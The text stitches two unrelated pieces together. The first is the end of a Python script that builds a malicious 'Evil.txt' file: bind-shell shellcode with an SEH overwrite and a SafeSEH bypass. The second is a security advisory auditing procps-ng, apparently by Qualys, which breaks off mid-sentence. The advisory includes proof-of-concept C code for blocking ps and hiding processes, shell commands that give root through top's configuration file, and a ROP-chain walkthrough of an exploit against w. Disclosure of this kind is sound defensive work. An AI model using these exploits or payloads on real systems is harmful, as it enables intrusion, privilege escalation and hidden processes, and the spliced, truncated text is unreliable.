shellcode += "\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6"
shellcode += "\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d"
shellcode += "\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc"
shellcode += "\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95"
shellcode += "\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69"
shellcode += "\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63"
shellcode += "\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c"
shellcode += "\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20"
shellcode += "\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a"
shellcode += "\x19\xb3\x97\x5c\x8e\xb4\xbd"
magic = '\xd9\xee' # fldz
magic += '\xd9\x74\x24\xf4' # fnstenv [esp-0xc]
magic += '\x59' # pop ecx
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x90' # nop
magic += '\xfe\xcd' # dec ch
magic += '\xfe\xcd' # dec ch
magic += '\xff\xe1' # jmp ecx
buffer = '\x90' * 28 # nops
buffer += shellcode # bind shell
buffer += '\xcc' * (516-28-len(shellcode)) # filler to nSEH
buffer += '\x75\x06\x74\x06' # nSEH | jump net
buffer += '\x18\x05\xfc\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]
buffer += '\x90' * 5 # nops
buffer += magic # jump -512
buffer += '\xcc' * (3000-516-4-4-5-len(magic)) # junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
Qualys Security Advisory
Procps-ng Audit Report
========================================================================
Contents
========================================================================
Summary
1. FUSE-backed /proc/PID/cmdline
2. Unprivileged process hiding
3. Local Privilege Escalation in top (Low Impact)
4. Denial of Service in ps
5. Local Privilege Escalation in libprocps (High Impact)
5.1. Vulnerability
5.2. Exploitation
5.3. Exploitation details
5.4. Non-PIE exploitation
5.5. PIE exploitation
Acknowledgments
Patches.tar.gz.b64
========================================================================
Summary
========================================================================
We performed a complete audit of procps-ng, the "command line and full
screen utilities for browsing procfs, a 'pseudo' file system dynamically
generated by the [Linux] kernel to provide information about the status
of entries in its process table" (https://gitlab.com/procps-ng/procps).
procps-ng contains the utilities free, kill, pgrep, pidof, pkill, pmap,
ps, pwdx, skill, slabtop, snice, sysctl, tload, top, uptime, vmstat, w,
watch, and the necessary libprocps library.
We discovered and submitted patches for more than a hundred bugs and
vulnerabilities in procps-ng; for reference, our patches are available
at:
https://www.qualys.com/2018/05/17/procps-ng-audit-report-patches.tar.gz
and base64-encoded at the end of this advisory. In the remainder of this
advisory, we present our most interesting findings:
1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)
An attacker can block any read() access to /proc/PID/cmdline by
mmap()ing a FUSE file (Filesystem in Userspace) onto this process's
command-line arguments. The attacker can therefore block pgrep, pidof,
pkill, ps, and w, either forever (a denial of service), or for some
controlled time (a synchronization tool for exploiting other
vulnerabilities).
2. Unprivileged process hiding (CVE-2018-1121)
An unprivileged attacker can hide a process from procps-ng's
utilities, by exploiting either a denial of service (a rather noisy
method) or a race condition inherent in reading /proc/PID entries (a
stealthier method).
3. Local Privilege Escalation in top (CVE-2018-1122)
top reads its configuration file from the current working directory,
without any security check, if the HOME environment variable is unset
or empty. In this very unlikely scenario, an attacker can carry out an
LPE (Local Privilege Escalation) if an administrator executes top in
/tmp (for example), by exploiting one of several vulnerabilities in
top's config_file() function.
4. Denial of Service in ps (CVE-2018-1123)
An attacker can overflow the output buffer of ps, when executed by
another user, administrator, or script: a denial of service only (not
an LPE), because ps mmap()s its output buffer and mprotect()s its last
page with PROT_NONE (an effective guard page).
5. Local Privilege Escalation in libprocps (CVE-2018-1124)
An attacker can exploit an integer overflow in libprocps's
file2strvec() function and carry out an LPE when another user,
administrator, or script executes a vulnerable utility (pgrep, pidof,
pkill, and w are vulnerable by default; other utilities are vulnerable
if executed with non-default options). Moreover, an attacker's process
running inside a container can trigger this vulnerability in a utility
running outside the container: the attacker can exploit this userland
vulnerability and break out of the container or chroot. We will
publish our proof-of-concept exploits in the near future.
Additionally, CVE-2018-1125 has been assigned to
0008-pgrep-Prevent-a-potential-stack-based-buffer-overflo.patch, and
CVE-2018-1126 to 0035-proc-alloc.-Use-size_t-not-unsigned-int.patch.
========================================================================
1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)
========================================================================
In this experiment, we add a sleep(60) to hello_read() in
https://github.com/libfuse/libfuse/blob/master/example/hello.c and
compile it, mount it on /tmp/fuse, and mmap() /tmp/fuse/hello onto the
command-line arguments of a simple proof-of-concept:
$ gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello
$ mkdir /tmp/fuse
$ ./hello /tmp/fuse
$ cat > fuse-backed-cmdline.c << "EOF"
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#define die() do { \
fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
exit(EXIT_FAILURE); \
} while (0)
#define PAGESZ ((size_t)4096)
int
main(const int argc, const char * const argv[])
{
if (argc <= 0) die();
const char * const arg_start = argv[0];
const char * const last_arg = argv[argc-1];
const char * const arg_end = last_arg + strlen(last_arg) + 1;
if (arg_end <= arg_start) die();
const size_t len = arg_end - arg_start;
if (len < 2 * PAGESZ) die();
char * const addr = (char *)(((size_t)arg_start + PAGESZ-1) & ~(PAGESZ-1));
if (addr < arg_start) die();
if (addr + PAGESZ > arg_end) die();
const int fd = open("/tmp/fuse/hello", O_RDONLY);
if (fd <= -1) die();
if (mmap(addr, PAGESZ, PROT_READ, MAP_PRIVATE | MAP_FIXED, fd, 0) != addr) die();
if (close(fd)) die();
for (; {
sleep(1);
}
die();
}
EOF
$ gcc -Wall fuse-backed-cmdline.c -o fuse-backed-cmdline
$ ./fuse-backed-cmdline `perl -e 'print "A" x 8192'`
Then, if root executes ps (for example):
# time ps ax
PID TTY STAT TIME COMMAND
...
real 1m0.021s
user 0m0.003s
sys 0m0.017s
========================================================================
2. Unprivileged process hiding (CVE-2018-1121)
========================================================================
Several procps-ng utilities (pgrep, pidof, pkill, ps, w) read the
/proc/PID/cmdline of every process running on the system; hence, an
unprivileged attacker can hide a process (albeit noisily) by exploiting
a denial of service in procps-ng (for example, the FUSE-backed denial of
service, or one of the integer overflows in file2strvec()).
Alternatively, we devised a stealthier method for hiding a process:
1/ fork() our process until it occupies the last PID
(/proc/sys/kernel/pid_max - 1) or one of the last PIDs;
2/ monitor (with inotify) the /proc directory and the /proc/PID/stat
file of one of the very first PIDs, for IN_OPEN events (opendir() and
open());
3/ when these events occur (when a procps-ng utility starts scanning
/proc for /proc/PID entries), fork() our process until its PID wraps
around and occupies one of the very first PIDs;
4/ monitor (with inotify) the /proc directory for an IN_CLOSE_NOWRITE
event (closedir());
5/ when this event occurs (when the procps-ng utility stops scanning
/proc), go back to 1/.
This simple method works, because the kernel's proc_pid_readdir()
function returns the /proc/PID entries in ascending numerical order.
Moreover, this race condition can be made deterministic by using a
FUSE-backed /proc/PID/cmdline as a synchronization tool.
$ cat > unprivileged-process-hiding.c << "EOF"
#include <errno.h>
#include <limits.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#define die() do { \
fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
exit(EXIT_FAILURE); \
} while (0)
int
main(void)
{
for (; {
char lost[64];
{
const pid_t hi = getpid();
pid_t lo = fork();
if (lo <= -1) die();
if (!lo) { /* child */
lo = getpid();
if (lo < hi) exit(EXIT_SUCCESS); /* parent continues */
for (; {
if (kill(hi, 0) != -1) continue;
if (errno != ESRCH) die();
break;
}
continue;
}
/* parent */
if (lo > hi) exit(EXIT_FAILURE); /* child continues */
int status = 0;
if (waitpid(lo, &status, 0) != lo) die();
if (!WIFEXITED(status)) die();
if (WEXITSTATUS(status) != EXIT_SUCCESS) die();
printf("%d -> %d -> ", hi, lo);
for (; {
struct stat st;
if (--lo <= 0) die();
snprintf(lost, sizeof(lost), "/proc/%d/stat", lo);
if (stat(lost, &st) == 0) break;
}
printf("%d\n", lo);
}
const int pofd = inotify_init();
if (pofd <= -1) die();
if (inotify_add_watch(pofd, "/proc", IN_OPEN) <= -1) die();
const int lofd = inotify_init();
if (lofd <= -1) die();
if (inotify_add_watch(lofd, lost, IN_OPEN) <= -1) die();
const int pcfd = inotify_init();
if (pcfd <= -1) die();
if (inotify_add_watch(pcfd, "/proc", IN_CLOSE_NOWRITE) <= -1) die();
char buf[sizeof(struct inotify_event) + NAME_MAX + 1];
const struct inotify_event * const evp = (void *)buf;
for (; {
if (read(pofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();
if (evp->mask & IN_ISDIR) break;
}
if (read(lofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();
for (; {
const pid_t hi = getpid();
pid_t lo = fork();
if (lo <= -1) die();
if (lo) exit(EXIT_SUCCESS); /* parent */
/* child */
lo = getpid();
if (lo < hi) {
printf("%d -> %d\n", hi, lo);
break;
}
}
for (; {
if (read(pcfd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();
if (evp->mask & IN_ISDIR) break;
}
if (close(pofd)) die();
if (close(lofd)) die();
if (close(pcfd)) die();
}
die();
}
EOF
$ gcc -Wall unprivileged-process-hiding.c -o unprivileged-process-hiding
$ ./unprivileged-process-hiding
Then, if root executes ps (for example):
# ps ax | grep '[u]nprivileged-process-hiding' | wc
0 0 0
========================================================================
3. Local Privilege Escalation in top (CVE-2018-1122)
========================================================================
If a/ an administrator executes top in a directory writable by an
attacker and b/ the HOME environment variable is unset or empty, then
top reads its configuration file from the current working directory,
without any security check:
3829 static void configs_read (void) {
....
3847 p_home = getenv("HOME");
3848 if (!p_home || p_home[0] == '\0')
3849 p_home = ".";
3850 snprintf(Rc_name, sizeof(Rc_name), "%s/.%src", p_home, Myname);
3851
3852 if (!(fp = fopen(Rc_name, "r"))) {
....
3865 if (fp) {
3866 p = config_file(fp, Rc_name, &tmp_delay);
Although b/ is very unlikely, we developed a simple command-line method
for exploiting one of the vulnerabilities in config_file(), when top is
not a PIE (Position-Independent Executable). For example, on Ubuntu
16.04.4:
$ file /usr/bin/top
/usr/bin/top: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e64fe2c89ff07ca4ce5d169078586d2854628a29, stripped
First, we dump a clean configuration file to /tmp/.toprc, by running top
and pressing the 'W' key:
$ cd /tmp
$ env -u HOME top
W
q
Second, we add an arbitrary "inspect" command to this configuration file
(inspect commands are normally executed when the user presses the 'Y'
key):
$ echo -e 'pipe\tname\tid>>/tmp/top.%d.%lx' >> .toprc
To execute our inspect command without user interaction, we will emulate
the 'Y' key by jumping directly into inspection_utility(), at 0x40a989
(the fflush(stdout) is INSP_BUSY's last instruction):
3442 static void inspection_utility (int pid) {
....
3496 case kbd_ENTER:
3497 INSP_BUSY;
3498 Insp_sel = &Inspect.tab[sel];
3499 Inspect.tab[sel].func(Inspect.tab[sel].fmts, pid);
40a97d: 48 8b 3d 1c f8 20 00 mov 0x20f81c(%rip),%rdi # 61a1a0 <stdout>
40a984: e8 67 7f ff ff callq 4028f0 <fflush@plt>
40a989: 48 63 05 2c f9 20 00 movslq 0x20f92c(%rip),%rax # 61a2bc
40a990: 8b 74 24 74 mov 0x74(%rsp),%esi
40a994: 48 c1 e0 06 shl $0x6,%rax
40a998: 48 03 05 61 11 23 00 add 0x231161(%rip),%rax # 63bb00
40a99f: 48 89 05 12 11 23 00 mov %rax,0x231112(%rip) # 63bab8
40a9a6: 48 8b 78 18 mov 0x18(%rax),%rdi
40a9aa: ff 10 callq *(%rax)
40a9ac: 5b pop %rbx
To jump directly into inspection_utility(), we will take control of
top's execution flow, by exploiting a vulnerability in config_file().
"sortindx" is read from the configuration file without any sanity check,
and is later used by window_show() to access a struct FLD_t which
contains a function pointer "sort":
5876 static int window_show (WIN_t *q, int wmax) {
....
5894 qsort(q->ppt, Frame_maxtask, sizeof(proc_t*), Fieldstab[q->rc.sortindx].sort);
40de01: ba 08 00 00 00 mov $0x8,%edx
40de06: 48 c1 e0 05 shl $0x5,%rax
40de0a: 48 8b 88 30 99 61 00 mov 0x619930(%rax),%rcx
40de11: e8 7a 47 ff ff callq 402590 <qsort@plt>
To take control of this function pointer, we will write 0x40a989's LSW
(Least Significant Word, 32 bits) into "graph_mems" and 0x40a989's MSW
(Most Significant Word, 32 bits) into "summclr", which are read from the
configuration file and written to 0x63ed30 (and 0x63ed34), a memory
location accessible by 0x619930+(sortindx<<0x5):
3676 static const char *config_file (FILE *fp, const char *name, float *delay) {
....
3710 if (3 > fscanf(fp, "\twinflags=%d, sortindx=%d, maxtasks=%d, graph_cpus=%d, graph_mems=%d\n"
3711 , &w->rc.winflags, &w->rc.sortindx, &w->rc.maxtasks, &w->rc.graph_cpus, &w->rc.graph_mems))
3712 return p;
3713 if (4 != fscanf(fp, "\tsummclr=%d, msgsclr=%d, headclr=%d, taskclr=%d\n"
3714 , &w->rc.summclr, &w->rc.msgsclr
3715 , &w->rc.headclr, &w->rc.taskclr))
3716 return p;
406f90: 4d 8d b5 30 ed 63 00 lea 0x63ed30(%r13),%r14
.......
406fa9: 41 56 push %r14
.......
406fb3: e8 d8 b7 ff ff callq 402790 <fscanf@plt>
.......
406fca: 49 8d 95 34 ed 63 00 lea 0x63ed34(%r13),%rdx
.......
406fe5: e8 a6 b7 ff ff callq 402790 <fscanf@plt>
Next, we modify the configuration file's "graph_mems", "summclr", and
"sortindx" accordingly:
$ sed -i s/'graph_mems=[0-9]*'/graph_mems=$((0x40a989))/ .toprc
$ sed -i s/'summclr=[0-9]*'/summclr=0/ .toprc
$ sed -i s/'sortindx=[0-9]*'/sortindx=$(((0x63ed30-0x619930)>>0x5))/ .toprc
Last, we turn off the View_MEMORY bit in the configuration file's
"winflags", to prevent summary_show() from crashing because of our
out-of-bounds "graph_mems":
314 #define View_MEMORY 0x001000 // 'm' - display memory summary
5418 static void summary_show (void) {
....
5499 if (isROOM(View_MEMORY, 2)) {
....
5540 if (w->rc.graph_mems) {
....
5559 ix = w->rc.graph_mems - 1;
....
5572 snprintf(util, sizeof(util), gtab[ix].swap, (int)((pct_swap * Graph_adj) + .5), gtab[ix].type);
$ winflags=`grep -m 1 winflags= .toprc | sed s/'.*winflags=\([0-9]*\).*'/'\1'/`
$ sed -i s/'winflags=[0-9]*'/winflags=$((winflags&~0x001000))/ .toprc
Then, if an administrator executes top in /tmp, without a HOME
environment variable (or with an empty HOME environment variable):
# cat /tmp/top.*
cat: '/tmp/top.*': No such file or directory
# cd /tmp
# env -u HOME top
...
signal 11 (SEGV) was caught by top, please
see http://www.debian.org/Bugs/Reporting
Segmentation fault (core dumped)
# cat /tmp/top.*
uid=0(root) gid=0(root) groups=0(root)
========================================================================
4. Denial of Service in ps (CVE-2018-1123)
========================================================================
ps's functions pr_args(), pr_comm(), and pr_fname() are vulnerable to an
mmap-based buffer overflow of outbuf (ps's output buffer):
401 static int pr_args(char *restrict const outbuf, const proc_t *restrict const pp){
402 char *endp = outbuf;
403 int rightward = max_rightward;
404 int fh = forest_helper(outbuf);
405
406 endp += fh;
407 rightward -= fh;
408
409 if(pp->cmdline && !bsd_c_option)
410 endp += escaped_copy(endp, *pp->cmdline, OUTBUF_SIZE, &rightward);
411 else
412 endp += escape_command(endp, pp, OUTBUF_SIZE, &rightward, ESC_DEFUNCT);
413
414 if(bsd_e_option && rightward>1) {
415 if(pp->environ && *pp->environ) {
416 *endp++ = ' ';
417 rightward--;
418 endp += escape_strlist(endp, pp->environ, OUTBUF_SIZE, &rightward);
419 }
420 }
421 return max_rightward-rightward;
422 }
The number of bytes written to endp by the escape*() functions is added
to endp (a pointer into outbuf), but never subtracted from OUTBUF_SIZE.
Normally "rightward" prevents this buffer overflow, because the maximum
number of "cells" written to outbuf is OUTBUF_SIZE, and is equal to the
number of "bytes" written to outbuf; but not in escape_str_utf8():
36 static int escape_str_utf8(char *restrict dst, const char *restrict src, int bufsize, int *maxcells){
..
50 if (!(len = mbrtowc (&wc, src, MB_CUR_MAX, &s)))
..
78 int wlen = wcwidth(wc);
..
100 memcpy(dst, src, len);
101 my_cells += wlen;
102 dst += len;
103 my_bytes += len;
104 src += len;
For example, in the "en_US.UTF-8" locale, the multibyte sequence
"\xf4\x81\x8e\xb6" consumes 4 bytes, but only 1 cell, and an easy
trigger for one of the outbuf overflows is:
$ (A=`python -c 'print "\xf4\x81\x8e\xb6" * 32767'` exec -a `python -c 'print "A" * 65535'` sleep 60) &
[1] 2670
# env LANG=en_US.UTF-8 ps awwe
PID TTY STAT TIME COMMAND
...
Signal 11 (SEGV) caught by ps (procps-ng version 3.3.10).
2670 pts/0 S 0:00ps:display.c:66: please report this bug
Segmentation fault
This buffer overflow is a denial of service only (not an LPE), because
ps mmap()s outbuf and mprotect()s its last page with PROT_NONE (an
effective guard page):
2147 void init_output(void){
....
2164 outbuf = mmap(
2165 0,
2166 page_size * (outbuf_pages+1), // 1 more, for guard page at high addresses
2167 PROT_READ | PROT_WRITE,
2168 MAP_PRIVATE | MAP_ANONYMOUS,
2169 -1,
2170 0
2171 );
....
2174 mprotect(outbuf + page_size*outbuf_pages, page_size, PROT_NONE); // guard page
========================================================================
5. Local Privilege Escalation in libprocps (CVE-2018-1124)
========================================================================
========================================================================
5.1. Vulnerability
========================================================================
libprocps's file2strvec() function parses a process's /proc/PID/cmdline
(or /proc/PID/environ), and creates an in-memory copy of this process's
argv[] (command-line argument strings, and pointers to these strings).
file2strvec() is called when either PROC_FILLCOM or PROC_FILLARG, but
not PROC_EDITCMDLCVT, is passed to openproc() or readproctab() (or
PROC_FILLENV but not PROC_EDITENVRCVT).
file2strvec() is vulnerable to three integer overflows (of "tot", "c",
and "tot + c + align"):
660 static char** file2strvec(const char* directory, const char* what) {
661 char buf[2048]; /* read buf bytes at a time */
662 char *p, *rbuf = 0, *endbuf, **q, **ret;
663 int fd, tot = 0, n, c, end_of_file = 0;
664 int align;
...
670 /* read whole file into a memory buffer, allocating as we go */
671 while ((n = read(fd, buf, sizeof buf - 1)) >= 0) {
...
686 rbuf = xrealloc(rbuf, tot + n); /* allocate more memory */
687 memcpy(rbuf + tot, buf, n); /* copy buffer into it */
688 tot += n; /* increment total byte ctr */
...
697 endbuf = rbuf + tot; /* count space for pointers */
698 align = (sizeof(char*)-1) - ((tot + sizeof(char*)-1) & (sizeof(char*)-1));
699 for (c = 0, p = rbuf; p < endbuf; p++) {
700 if (!*p || *p == '\n')
701 c += sizeof(char*);
...
705 c += sizeof(char*); /* one extra for NULL term */
706
707 rbuf = xrealloc(rbuf, tot + c + align); /* make room for ptrs AT END */
To the best of our knowledge, the integer overflows of "c" and "tot + c
+ align" are not exploitable beyond a denial of service: they result in
an mmap-based buffer overflow of rbuf, but with pointers only (pointers
to our command-line argument strings, and a NULL terminator). Similarly,
we were unable to exploit the integer overflow of "tot" on 32-bit.
On 64-bit, however, the integer overflow of "tot" results in a memcpy()
of arbitrary bytes (our command-line arguments) to an offset of roughly
-2GB below rbuf. Surprisingly, the "xrealloc(rbuf, tot + n)" before the
memcpy() does not exit() when "tot" becomes negative, because xrealloc()
incorrectly uses an "unsigned int size" argument instead of a size_t
(CVE-2018-1126):
66 void *xrealloc(void *oldp, unsigned int size) {
========================================================================
5.2. Exploitation
========================================================================
To exploit the integer overflow of "tot" on 64-bit, we are faced with
several difficulties:
- We must defeat NX, ASLR, PIE, full RELRO, SSP (Stack-Smashing
Protector), and FORTIFY.
- Our exploit must be one-shot, or as close to one-shot as possible: we
may use brute-force if the target procps-ng utility is executed by a
script, but we have only one chance to exploit this vulnerability if
the target utility is executed manually by an administrator.
- We have no control over the target utility's command-line arguments,
environment variables, or resource limits (it is executed by another
user, administrator, or script), and we have no direct channel for an
information leak (we have no access to the target utility's output,
for example).
- We were unable to exploit the integer overflow of "tot" when rbuf is
mmap()ed (but we were also unable to prove that it is unexploitable);
when the integer "tot" overflows, rbuf is an mmap()ed chunk (its size
is roughly 2GB), and because Linux's mmap() is a top-down allocator,
we believe that:
. rbuf must be allocated in a hole of the mmap-space (to survive the
memcpy() at a negative offset below rbuf);
. it is impossible to make such a large hole (in procps-ng, calls to
the malloc functions are extremely rare).
Despite these difficulties, we developed proof-of-concept exploits
against the procps-ng utility "w" on Ubuntu 16.04 (a one-shot exploit
against a partial RELRO, non-PIE w), Debian 9 and Fedora 27 (a nearly
one-shot exploit against a full RELRO, PIE w): if we first force "w" to
malloc()ate n_mmaps_max = 64K mmap()ed chunks (whose size is larger than
mmap_threshold = 128KB), then malloc() will not call mmap() anymore, but
will call brk() instead, even for chunks larger than mmap_threshold. The
2GB rbuf (after the integer overflow of tot) will therefore be allocated
on the heap by brk(), and because brk() is a bottom-up allocator, we can
easily arrange for the memcpy() at rbuf - 2GB to overwrite the beginning
of the heap:
- if w is not a PIE, we overwrite libprocps's internal PROCTAB structure
and its function pointers;
- if w is a PIE, we overwrite the glibc's internal *gettext() structures
and transform this memory corruption into a format-string exploit.
To force 64K allocations of 128KB (8GB) in w, we need 64K distinct PIDs
(each /proc/PID/cmdline allocates 128KB in file2strvec()): consequently,
/proc/sys/kernel/pid_max must be greater than 64K (it is 32K by default,
even on 64-bit). This is not an unusual setting: large servers (database
servers, container and storage platforms) commonly increase the value of
pid_max (up to 4M on 64-bit). Besides pid_max, other settings may limit
our ability to spawn 64K processes: /proc/sys/kernel/threads-max,
RLIMIT_NPROC, and systemd-logind's UserTasksMax. Unlike pid_max,
however, these limits are not insuperable obstacles:
- they may be naturally greater than 64K, depending on the total number
of RAM pages (for /proc/sys/kernel/threads-max and RLIMIT_NPROC) or
the value of pid_max (for UserTasksMax);
- they may not apply to the attacker's user account (for example,
systemd-logind may not at all manage this specific user account);
- in any case, we do not need to spawn 64K concurrent processes: if we
use /proc/PID/cmdline as a FUSE-backed synchronization tool, we need
only a few concurrent processes.
========================================================================
5.3. Exploitation details
========================================================================
Our proof-of-concept exploit spawns five different types of processes
("main", "mmap", "dist", "wrap", and "srpt"):
- a long-lived "main" process, which spawns and coordinates the other
processes;
- 64K long-lived "mmap" processes, which guarantee that the ~2GB rbufs
of our "dist" and "wrap" processes are allocated by brk() in the heap
of our future "w" target; the "mmap" processes occupy the lowest PIDs
available, to avoid interference from other processes with the heap
layout of w;
- a long-lived "dist" ("distance") process, whose /proc/PID/cmdline is
carefully constructed to cover the exact distance between our target
structure (at the beginning of w's heap) and the rbuf of our "wrap"
process (at the end of w's heap);
- a long-lived "wrap" ("integer wrap") process, which overflows the
integer "tot" and overwrites our target structure at the beginning of
w's heap (with the memcpy() at rbuf - 2GB);
- short-lived "srpt" ("simulate readproctab") processes, which measure
the exact distance between our target structure (at the beginning of
w's heap) and the rbuf of our "wrap" process (at the end of w's heap);
because this distance depends on an accurate list of processes running
on the system, our exploit regularly spawns "srpt" processes until the
distance stabilizes (it is particularly unstable after a reboot).
We use a few noteworthy tricks in this exploit:
- we do not fork() but clone() the "mmap" processes (we use the flags
CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | CLONE_SIGHAND, but
not CLONE_THREAD, because each process must have its own /proc/PID
entry): this is much faster, and significantly reduces the memory
consumption of our exploit (the target "w" process itself already
consumes over 12GB = 64K*128KB + 2GB + 2GB -- the rbufs for the
"mmap", "dist", and "wrap" processes);
- we analyze the ~2GB command-line argument strings of our "dist" and
"wrap" processes, to detect repeated patterns and replace them with
our equivalent file-backed mmap()s (this further reduces the memory
consumption of the exploit); moreover, we replace the argv[] pointers
of these processes with PROT_NONE mmap()s (hundreds of megabytes that
are never accessed);
- we initially simulated readproctab() with our own exploit code, but
eventually switched to a small LD_PRELOAD library that instruments the
real "w" utility and provides more accurate measurements.
There is much room for improvement in this proof-of-concept exploit: for
example, it depends on the exact distance between our target structure
(at the beginning of w's heap) and the rbuf of our "wrap" process (at
the end of w's heap), but this distance is hard to measure inside a
container, because processes running outside the container are not
visible inside the container (brute-force may be a solution if the
target utility is executed by a script, but not if it is executed
manually by an administrator; better solutions may exist).
========================================================================
5.4. Non-PIE exploitation
========================================================================
In this section, we describe our simplest proof-of-concept exploit,
against the non-PIE "w" on Ubuntu 16.04: we overflow the integer "tot"
in file2strvec(), we overwrite the PROCTAB structure and its function
pointers, and we jump into the executable segment of w. However, w is
very small and contains no useful gadgets, syscall instructions, or
library calls. Instead, we use a technique pioneered by Nergal in
http://phrack.org/issues/58/4.html ("5 - The dynamic linker's
dl-resolve() function"):
We jump to the very beginning of w's PLT (Procedure Linkage Table),
which calls _dl_runtime_resolve() and _dl_fixup() with a "reloc_arg"
that we control (it is read from the stack) and that indexes our own
fake Elf64_Rela structure (in w's heap), which in turn indexes a fake
Elf64_Sym structure, which in turn indexes a string that we control and
that allows us to call any library function, by name (even if it does
not appear in w's PLT). The obvious choice here is the "system"
function:
- the RDI register (the first argument of the function pointer that we
overwrote, and hence the command argument of system()) points to the
PROCTAB structure, whose contents we control;
- we do not need to worry about the privilege dropping of /bin/sh,
because w is not a set-user-ID executable.
Finally, we must solve two practical problems to use this dynamic-linker
technique against w:
- our fake ELF structures are located in the heap, but indexed from the
executable, and a random gap separates the heap from the executable:
we therefore allocate four large areas in the heap (large enough to
defeat the randomization of the heap), one for each of our fake
structures (Elf64_Rela, Elf64_Sym, "system", and ndx for symbol
versioning);
- malloc guarantees a 16-byte alignment, but Elf64_Rela and Elf64_Sym
are 24-byte structures: luckily, the last 8 bytes of these structures
are unused, and we therefore truncate our fake structures to 16 bytes.
For example, on Ubuntu 16.04.4, we overwrite the PROCTAB structure with
the following ROP chain:
procfs taskdir tdu df finder reader tfinder
|--------|--------|----+---|--------|--------|--------|------|--------|--------|
| id>>/tmp/w.$$ |000|0x4020bb|0x4029db|0x401100| .... |relocarg|0x402a50|
|--------|--------|----+---|--------|--------|--------|------|--------|--------|
0xffb8 bytes
- the first gadget that we execute, 0x4020bb, pivots the stack pointer
to RDI (which points to the very beginning of the PROCTAB structure):
"push rdi; ...; pop rsp; pop r13; pop r14; pop r15; pop rbp; ret;"
- the second gadget that we execute, 0x4029db, increases the stack
pointer by 0xffb8 bytes (it would otherwise crash into the beginning
of the heap, because the stack grows down): "ret 0xffb8;"
- the third gadget that we execute, 0x401100, calls
_dl_runtime_resolve() and _dl_fixup() with our own "relocarg" (this
effectively calls system() with the command located at RDI,
"id>>/tmp/w.$$"):
401100: ff 35 02 2f 20 00 pushq 0x202f02(%rip)
401106: ff 25 04 2f 20 00 jmpq *0x202f04(%rip)
- the fourth gadget that we execute, 0x402a50, makes a clean exit:
402a50: bf 01 00 00 00 mov $0x1,%edi
402a55: e8 36 e7 ff ff callq 401190 <_exit@plt>
$ ./w-exploit-Non-PIE
positive_tot 2147482113
distance_tot 2147482112
distance 12024752
...
distance 12024752
off 279917264
ver_beg 2e26ce0 ver_end 5426ce0
rel_beg 15f19fb0 rel_end 18519fb0
str_beg 2900d280 str_end 2b60d280
sym_beg 3c100570 sym_end 3e700570
reloc_arg 16957128
nentries 5
POSITIVE_TOT 2147482113
DISTANCE_TO_PT 1
negwrite_off 2147485183
nentries 1
ready
Then, if an administrator executes w:
# cat /tmp/w.*
cat: '/tmp/w.*': No such file or directory
# w
# cat /tmp/w.*
uid=0(root) gid=0(root) groups=0(root)
========================================================================
5.5. PIE exploitation
========================================================================
In this section, we describe our proof-of-concept exploit against the
PIE "w" on Debian 9 and Fedora 27. The first technique that we tried, a
partial overwrite of a function pointer in the PROCTAB structure, does
not work:
- we are limited to a 2-byte overwrite, or else we lose the "one-shot"
quality of our exploit (we must brute-force the random bits that we
overwrite);
- the original function pointer refers to a piece of code in libprocps
that offers a very limited choice of gadgets;
- file2strvec() ends our command-line argument strings (which overwrite
the function pointer) with a null byte, and further reduces the number
of available gadgets.
Our second, working technique is derived from halfdog's fascinating
https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ and
transforms libprocps's integer overflow and memory corruption into a
format-string exploit:
- we overwrite the dirname pointer to "/usr/share/locale" (a member of
the struct binding malloc()ated at the very beginning of w's heap by
bindtextdomain()) with a pointer to "/tmp" -- we do not need to worry
about ASLR, because we arrange for file2strvec() to overwrite dirname
with a pointer to our command-line argument strings; alternatively, we
could overwrite the "procps-ng" string (malloc()ated at the beginning
of w's heap by textdomain()), but this would also overwrite the chunk
header of the struct PROCTAB, and would cause a crash in closeproc();
- we thereby control the translation strings returned by the *gettext()
functions and the _() macro (the overwritten dirname pointer is used
to construct the names of the translation files ".mo") and therefore
control two format-strings in w's main():
591 printf(_("%-*s TTY "), userlen, _("USER"));
...
595 printf(_(" LOGIN@ IDLE JCPU PCPU WHAT\n"));
- we exploit the first format-string to create a pointer to a saved RIP
on the stack, and we write this pointer to the stack itself;
- we use this pointer, and the second format-string, to overwrite the
saved RIP with the address of a useful libc gadget (we return into
popen() on Debian 9, and wordexp() on Fedora 27).
However, unlike halfdog, we cannot defeat ASLR by simply dumping the
contents of the stack with a format-string, because we have not access
to the output of "w" (it is executed by another user, administrator, or
script). Instead, we implement Chris Evans's "read-add-write" primitive
